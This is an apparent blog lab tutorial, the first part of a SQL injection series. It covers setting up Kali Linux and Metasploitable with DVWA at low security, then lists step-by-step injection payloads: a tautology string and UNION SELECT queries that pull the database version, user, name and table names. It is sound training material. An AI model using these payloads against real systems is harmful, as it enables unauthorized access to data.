SQL injection lab PT.1 – Intro/Lab setup – HC NEPAL


Hello Gurkhas ! ! !

By : Bijay Acharya  | Add him in Facebook here > https://www.facebook.com/nhcbijay.ach  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > > Student Video Tutorial 

In this lab, We’ll begin the series of SQL Injection. This will be Part-Wise Article/Guide on SQL Injection.

  • Let’s start from LAB setup :
    > Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.
    > Check IP address of both devices.
  • Step-by-step instruction
    1. Open Kali Linux (or BT 5r3)
    2. Open your browser and type http://IP address of
    Metasploitable/dvwa/login.php
    3. Login with user name “admin” and password “password”
    4. Click on DVWA Security and set it to low then submit
    5. Click on manual SQL injection
    6. On User ID box type 1 and Submit
    (Php select statement: $getid = “SELECT first_name, last_name FROM
    users WHERE user_id = ‘$id’”;)
    7. %’ or ‘0’=’0
    (mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
    ‘0’=’0′;)
    8. Get DB version: %’ or 0=0 union select null, version() #
    9. Get DB user: %’ or 0=0 union select null, user() #
    10. Get DB name: %’ or 0=0 union select null, database() #
    11. Get Schima information: %’ and 1=0 union select null, table_name from
    information_schema.tables #
  • MORE here > http://lab.hcnepal.com/2016/08/24/sql-injection-lab-pt-1-introlab-setup-hc-nepal/